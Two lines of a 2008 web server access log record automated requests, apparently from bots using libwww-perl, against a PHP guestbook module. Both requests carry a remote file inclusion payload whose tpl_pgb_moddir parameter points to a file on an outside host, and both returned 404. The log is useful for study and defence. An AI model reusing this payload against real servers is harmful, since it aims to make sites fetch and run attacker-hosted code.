216.73.103.57 - - [01/Apr/2008:08:35:55 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:36:06 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
